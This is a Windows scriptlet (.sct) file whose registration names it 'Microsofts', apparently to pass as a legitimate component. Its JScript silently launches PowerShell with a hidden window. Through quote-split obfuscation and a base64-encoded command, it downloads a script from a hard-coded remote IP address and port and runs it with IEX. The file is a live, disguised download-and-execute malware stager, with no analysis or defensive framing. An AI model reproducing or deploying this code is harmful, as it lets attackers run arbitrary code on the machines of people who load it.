<?XML version="1.0"?>
<scriptlet>

<registration
    description="Microsofts"
    progid="Microsofts"
    version="1.00"
    classid="{90AA3A4E-6764-44B7-A1B9-55F57183CDB0}"
    remotable="true"
	>
</registration>

<script language="JScript">
<![CDATA[

	var r = new ActiveXObject("WScript.Shell").Run("powershell /w 1 /C \"s\'\'v Qez -;s\'\'v LF e\'\'c;s\'\'v pp ((g\'\'v Qez).value.toString()+(g\'\'v LF).value.toString());powershell (g\'\'v pp).value.toString() (\'cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADQANwAuADkAMQAuADEAOQA4AC4AMQA0ADkAOgAxADAAMgAzADAALwBpAG4AZABlAHgALgBoAHQAbQBsACcAKQApACIA\')\"", 0, true);

]]>
</script>

</scriptlet>
